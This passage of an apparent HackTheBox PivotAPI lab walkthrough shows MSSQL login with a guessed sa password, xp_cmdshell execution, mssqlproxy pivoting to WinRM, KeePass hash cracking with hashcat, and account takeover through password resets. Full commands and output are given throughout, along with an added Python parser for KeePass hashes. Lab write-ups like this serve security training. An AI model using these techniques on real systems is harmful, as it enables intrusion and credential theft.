SMB 10.129.207.210 445 PIVOTAPI [+] LicorDeBellota.htb\svc_mssql:#mssql_s3rV1c3!2020
It is valid. This is not a coincidence: large organisations tend to have strict conventions, and passwords set by operations staff frequently follow a pattern; the guess above was built on information already gathered and then verified before use
Connecting to MSSQL for more information
Try connecting to mssql:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/svc_mssql:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
The first connection with the recovered user name did not succeed, but logging in with MSSQL's default administrative account sa did. Had that failed as well, the three user names leaked by the .bat script would have been next. Now check whether command execution can be enabled, to gather more information:
SQL (sa dbo@master)> enable_xp_cmdshell
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'show advanced options' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'xp_cmdshell' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
SQL (sa dbo@master)> xp_cmdshell whoami
output
---------------------------
nt service\mssql$sqlexpress
NULL
SQL (sa dbo@master)>
System information collected:
SQL (sa dbo@master)> xp_cmdshell systeminfo
output
--------------------------------------------------------------------------------
NULL
Host Name: PIVOTAPI
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/D Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00520-27817-AA848
Original Install Date: 07/08/2020, 23:14:31
System Boot Time: 06/02/2024, 8:39:58
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: es;Spanish (International)
Input Locale: en-us;English (United States)
Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,888 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,520 MB
Virtual Memory: In Use: 1,279 MB
Page File Location(s): C:\pagefile.sys
Domain: LicorDeBellota.htb
Logon Server: N/A
Hotfix(es): 8 Hotfix(s) Installed.
[01]: KB4601558
[02]: KB4494174
[03]: KB4535680
[04]: KB4558997
[05]: KB4577586
[06]: KB4601393
[07]: KB5001404
[08]: KB5001342
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP Address(es)
[01]: 10.129.207.210
Hyper-V Requirements: A hypervisor was detected. Features required for Hyper-V will not be displayed.
Check which privileges the current user holds:
SQL (sa dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGE INFORMATION
--------------------------
NULL
Privilege Name Description State
============================= ================================================ =============
SeAssignPrimaryTokenPrivilege Replace a process-level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to the domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
From experience, SeImpersonatePrivilege and SeManageVolumePrivilege are both privileges commonly abused for local privilege escalation (SeImpersonatePrivilege via the potato family of token-impersonation tools) and could be tried; when the goal is to practise domain penetration they can be deprioritised for now, since escalating directly with a tool would skip the Active Directory path
We can also look at the other domain users:
SQL (sa dbo@master)> xp_cmdshell net user
output
-------------------------------------------------------------------------------
NULL
User accounts on \\PIVOTAPI
NULL
-------------------------------------------------------------------------------
0xdf 0xVIC 3v4Si0N
Administrador aDoN90 borjmz
cybervaca Dr.Zaiuss Fiiti
FrankyTech Gh0spp7 gibdeon
Invitado ippsec jari
Jharvar Kaorz krbtgt
lothbrok manulqwerty OscarAkaElvis
socketz sshd StooormQ
superfume svc_mssql v1s0r
The command completed successfully.
The user name from the recovered credential, svc_mssql, is in the list; look at its details:
SQL (sa dbo@master)> xp_cmdshell net user svc_mssql /domain
output
-----------------------------------------------------------------------------
Username svc_mssql
Full Name mssql service
Comment
User's comment
Country/region code 000 (Default by the computer)
Account active Yes
Account expires Never
NULL
Last password change 08/08/2020 17:15:22
Password expires Never
Password changeable 09/08/2020 17:15:22
Password required Yes
User may change password No
NULL
Workstations allowed All
Logon script
User profile
Home directory
Last logon 09/08/2020 17:22:26
NULL
Logon hours allowed All
NULL
Local group memberships
Global group memberships *Domain Users
*WinRM
The command completed successfully.
Besides Domain Users, this user is also in the WinRM group, which the earlier e-mail mentioned. First check whether the service is running:
SQL (sa dbo@master)> xp_cmdshell netstat -ano | find "5985"
output
------------------------------------------------------------------------
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
It is running and listening, only not exposed externally. The e-mail also said a rule was created to block exposure of the service and that outbound TCP, UDP and even ICMP are blocked, so the usual tunnelling and port-forwarding approaches will not work. But we hold MSSQL's default sysadmin account, so we can try mssqlproxy, https://github.com/blackarrowsec/mssqlproxy
mssqlproxy is a toolkit for lateral movement through a compromised Microsoft SQL Server in restricted environments, by socket reuse: a CLR stored procedure loads a native DLL (reciclador) into the SQL Server process, which takes over the client's already-established connection on 1433, and mssqlclient.py then exposes a local SOCKS listener whose traffic travels over that existing connection, so the server needs neither a new listener nor an outbound connection. The client needs impacket and sysadmin privileges on the SQL Server.
Bypassing the blocking rule with mssqlproxy
But on cloning the repository it turns out its mssqlclient.py only works with Python 2, whereas Python 3 is what we use now. In such cases, first search for someone else's solution; only if there is none, modify the tool using your own understanding of security development. A search found:
Clone this new repository and try it:
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cp reciclador.dll ../
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cd ..
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
20240128095527_bloodhound.zip oracle_credential restart-service-strings users_list
api-monitor-v2r13-setup-x64.exe pdf_authors 'Server MSSQL.eml' 'WinRM Service.eml'
ftp pivotapi.pdf 'Server MSSQL.msg' 'WinRM Service.msg'
Kaorz_hash reciclador.dll set_export.sh
mssqlproxy Restart-OracleService.exe strings_Restart-Oracle
nmapscan restart-service.exe systeminfo
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> enable_ole
SQL> upload reciclador.dll c:\windows\temp\reciclador.dll
[+] Uploading 'reciclador.dll' to 'c:\windows\temp\reciclador.dll'...
[+] Size is 109056 bytes
[+] Upload completed
SQL> Traceback (most recent call last):
File "/home/cvestone/Desktop/htb/PivotAPI/mssqlproxy/mssqlclient.py", line 547, in <module>
shell.cmdloop()
File "/usr/lib/python3.11/cmd.py", line 126, in cmdloop
line = input(self.prompt)
^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ls
assembly.cs Microsoft.SqlServer.Proxy.dll mssqlclient.py README.md reciclador reciclador.dll
But this repository seems to contain only the assembly.cs source, not the compiled assembly; we can either look for a prebuilt dll or compile it ourselves
The upstream project already publishes one:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# wget -m https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
--2024-02-07 16:31:57-- https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream [following]
--2024-02-07 16:31:58-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4608 (4.5K) [application/octet-stream]
Saving to: 'github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll'
github.com/blackarrowsec/ms 100%[==========================================>] 4.50K --.-KB/s in 0s
2024-02-07 16:31:59 (54.4 MB/s) - 'github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll' saved [4608/4608]
FINISHED --2024-02-07 16:31:59--
Total wall clock time: 2.4s
Downloaded: 1 files, 4.5K in 0s (54.4 MB/s)
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll ./
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -install -clr assembly.dll
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[*] Proxy mode: install
[*] CLR enabled
[*] Assembly successfully installed
[*] Procedure successfully installed
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -start -reciclador 'c:\windows\temp\reciclador.dll'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!
Port 1337 is now listening; to be rigorous, confirm with netstat:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# netstat -tnlp | grep 1337
tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN 155907/python3
Connecting to WinRM for a shell
Now proxy through it with proxychains:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt /etc/proxychains4.conf
# append socks5 127.0.0.1 1337 at the end of the file
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1337 ... 127.0.0.1:5985 ... OK
*Evil-WinRM* PS C:\Users\svc_mssql\Documents> whoami
licordebellota\svc_mssql
The shell obtained this way is not very stable, perhaps because of the proxy connection state or something else: it often drops, and it takes about a minute before commands succeed again. That is the normal state of affairs in a penetration test; knowing the cause and the fix would save a lot of time, but without that knowledge the only option is to repeat the process, and in this situation there is no way to troubleshoot, so we wait
*Evil-WinRM* PS C:\Users\svc_mssql\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> ls
Directorio: C:\Users\svc_mssql\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/8/2020 10:12 PM 2286 credentials.kdbx
-a---- 4/30/2021 10:39 AM 93 note.txt
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download credentials.kdbx
Info: Downloading C:\Users\svc_mssql\desktop\credentials.kdbx to credentials.kdbx
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download note.txt
Info: Downloading C:\Users\svc_mssql\desktop\note.txt to note.txt
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop>
Look at the files just downloaded:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat ./note.txt
Long running MSSQL Proxies can cause issues. Please switch to SSH after getting credentials.
The note warns that long-running MSSQL proxies cause problems, exactly what we just hit. This has a strong lab-machine flavour; in the real world there would be no such obvious hint, but anyone who cannot bear waiting after every command would naturally look for a more stable shell anyway. Such problems are also often caused by some setting an administrator has configured. The .kdbx file is a KeePass Password Safe database. Opening a .kdbx requires KeePass or a compatible password manager, which are graphical, or the command-line tool kpcli, installable from the Linux package manager
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kpcli --kdb credentials.kdbx
Provide the master password:
# The master password has to be cracked first, so generate the intermediate hash:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx
credentials:$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx > credentials.kdbx.hash
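As an added example that is not part of the original notes, a Python parser for the keepass2john line above. It splits the hash into its named fields (KDF rounds, cipher, master seed, transform seed, IV, expected start bytes, contents hash), checks their lengths, and computes the composite key that is the first step of the KeePass 2 key derivation; the remaining steps (60000 AES-ECB rounds under the transform seed, the master-seed hash, and the first-block check against the expected start bytes) are what hashcat spends its 885 H/s on, and the helper at the end turns rate and keyspace into a worst-case cracking time. Only the password-only, AES-KDF (KDBX 3) layout is handled, which is what mode 13400 covers.

```python
import hashlib

# The keepass2john line from above, exactly as produced for credentials.kdbx
KEEPASS_HASH = (
    "credentials:$keepass$*2*60000*0*"
    "006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*"
    "deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*"
    "b33392502f94cd323ed25bc2d9c1749a*"
    "67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*"
    "dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b"
)

# Field sizes for the KDBX 3 (AES-KDF) layout, in bytes
FIELD_LEN = {"master_seed": 32, "transform_seed": 32, "iv": 16,
             "expected_start": 32, "contents_hash": 32}


def parse_keepass_hash(line):
    """Split a keepass2john line into named fields; password-only KDBX 3 databases only."""
    label, sep, rest = line.strip().partition("$keepass$*")
    if not sep:
        raise ValueError("not a keepass2john hash")
    f = rest.split("*")
    # f = [version, rounds, cipher id, master seed, transform seed, iv, expected start, contents hash]
    if f[0] != "2" or len(f) != 8:
        raise ValueError("only the KeePass 2.x layout without keyfile is handled")
    parsed = {"label": label.rstrip(":"), "version": 2, "rounds": int(f[1]),
              "cipher": "AES" if f[2] == "0" else f"cipher id {f[2]}"}
    for name, hexval in zip(FIELD_LEN, f[3:]):
        raw = bytes.fromhex(hexval)
        if len(raw) != FIELD_LEN[name]:
            raise ValueError(f"{name}: expected {FIELD_LEN[name]} bytes, got {len(raw)}")
        parsed[name] = raw
    return parsed


def composite_key(password):
    """Step 1 of the KDBX key derivation for a password-only database: SHA-256(SHA-256(password)).
    The cracker then applies `rounds` iterations of AES-256-ECB keyed with transform_seed,
    hashes the result, hashes it again with master_seed prepended to get the master key, and
    decrypts the first block with iv to compare against expected_start; that loop is the cost."""
    return hashlib.sha256(hashlib.sha256(password.encode("utf-8")).digest()).digest()


def worst_case_seconds(keyspace, hashes_per_second):
    """Time to exhaust a wordlist at the observed rate (rockyou at 885 H/s is about 4.5 h)."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    p = parse_keepass_hash(KEEPASS_HASH)
    print(f"{p['label']}: KeePass {p['version']}, {p['cipher']}, {p['rounds']} KDF rounds")
    for name in FIELD_LEN:
        print(f"  {name:15} {p[name].hex()}")
    print(f"rockyou worst case at 885 H/s: {worst_case_seconds(14344385, 885) / 3600:.1f} h")
```

The rounds field is the number to look at before starting a job: it is set by whoever created the database, and a database with a few million rounds (or the Argon2 KDF of KDBX 4, which this format does not cover) would make even rockyou impractical on a CPU.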
# Crack it with hashcat
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat --help | grep -i keepass
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Manager
29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat -m 13400 credentials.kdbx.hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 5 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b:mahalkita
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*60000*0*006e4f7f747a915a0301bded09da833...16ca6b
Time.Started.....: Wed Feb 7 18:13:36 2024 (0 secs)
Time.Estimated...: Wed Feb 7 18:13:36 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 885 H/s (3.41ms) @ Accel:16 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 320/14344385 (0.00%)
Rejected.........: 0/320 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:59392-60000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> 101010
Hardware.Mon.#1..: Temp: 68c Util: 7%
Started: Wed Feb 7 18:13:19 2024
Stopped: Wed Feb 7 18:13:37 2024
The password mahalkita is cracked quickly; reconnect and run commands:
kpcli:/> ls
=== Groups ===
Database/
kpcli:/> cd Database/
kpcli:/Database> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/Database> ls eMail/
kpcli:/Database> ls General/
kpcli:/Database> ls Homebanking/
kpcli:/Database> ls Internet/
kpcli:/Database> ls Network/
kpcli:/Database> ls Recycle\ Bin/
=== Entries ===
0. Sample Entry keepass.info
1. Sample Entry #2 keepass.info/help/kb/testform.
kpcli:/Database> ls Windows/
=== Entries ===
0. SSH
kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry
Path: /Database/Recycle Bin/
Title: Sample Entry
Uname: User Name
Pass: Password
URL: https://keepass.info/
Notes: Notes
kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry\ #2
Path: /Database/Recycle Bin/
Use of uninitialized value $comment in split at /usr/bin/kpcli line 6338.
Use of uninitialized value $val in pattern match (m//) at /usr/bin/kpcli line 3275.
Use of uninitialized value $val in sprintf at /usr/bin/kpcli line 3279.
Title: Sample Entry #2
Uname: Michael321
Pass: 12345
URL: https://keepass.info/help/kb/testform.html
Notes:
kpcli:/Database> show -f Windows/SSH
Path: /Database/Windows/
Title: SSH
Uname: 3v4Si0N
Pass: Gu4nCh3C4NaRi0N!23
URL:
Notes:
Given what we learned earlier, the last entry is clearly the most valuable
Getting a foothold
Connect with the SSH credential just obtained:
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ssh 3v4Si0N@10.129.207.210
The authenticity of host '10.129.207.210 (10.129.207.210)' can't be established.
ED25519 key fingerprint is SHA256:D84pRKEdwy8GejDfHWYVRaAr8wMUPhSz0V4EUOCZC3Y.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:14: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
。。。
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>cd Desktop
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: 94DB-AFCA
Directorio de C:\Users\3v4Si0N\Desktop
09/08/2020 16:01 <DIR> .
09/08/2020 16:01 <DIR> ..
06/02/2024 08:41 34 user.txt
1 archivos 34 bytes
2 dirs 4.234.256.384 bytes libres
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>type user.txt
ecd5457068cd545b4f64647d1d017ed3
So the User Flag is: ecd5457068cd545b4f64647d1d017ed3
Lateral movement
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\3v4Si0N\Desktop> cd c:\
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 08/08/2020 19:23 Developers
d----- 08/08/2020 12:53 inetpub
d----- 08/08/2020 22:48 PerfLogs
d-r--- 19/02/2021 13:42 Program Files
d----- 09/08/2020 17:06 Program Files (x86)
d-r--- 08/08/2020 19:46 Users
d----- 29/04/2021 17:31 Windows
PS C:\> cd .\Developers\
PS C:\Developers> ls
ls : Access to the path 'C:\Developers' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\Developers:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
# The "Developers" here looks like a user group name
PS C:\Developers> net group /domain
Group Accounts for \\PIVOTAPI
-------------------------------------------------------------------------------
*Administrators key
*Administrators key of the organization
*Business Administrators
*Schema Admins
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Domain Controllers Read-Only
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.
Developers is indeed one of the domain groups; see which users are in it:
PS C:\Developers> net group Developers /domain
Group Name Developers
Comment
Members
-------------------------------------------------------------------------------
jari superfume
The command completed successfully.
Another unfamiliar name. Go back to BloodHound and look for a new path, starting with the attack paths around the Developers group:
BloodHound lists the rights the users hold over one another and superfume's membership in Developers, so before we can read the Developers folder we have to walk that chain and end up as superfume. For instance, 3V4SI0N has ownership of the DR.ZAIUSS user object, so we can reset DR.ZAIUSS's password, which is as good as having a shell as DR.ZAIUSS; this is lateral movement:
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net user dr.zaiuss cvestone!666
The command completed successfully.
This does not get us an SSH login as DR.ZAIUSS, though:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ssh dr.zaiuss@10.129.228.115
dr.zaiuss@10.129.228.115's password:
Permission denied, please try again.
dr.zaiuss@10.129.228.115's password:
Besides SSH we still have evil-winrm; in another window run:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'cvestone!666'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1337 ... 127.0.0.1:5985 ... OK
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents> net user superfume cvestone!666
Se ha completado el comando correctamente.
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents>
In the same way, reset superfume's password to take over that account. If it fails, be patient and retry a few times, and move quickly, because note.txt already warned us that the proxied connection is unstable. superfume cannot log in over SSH either, so keep using evil-winrm:
*Evil-WinRM* PS C:\> cd Developers
*Evil-WinRM* PS C:\Developers> dir
Directorio: C:\Developers
Mode LastWriteTime Length Name
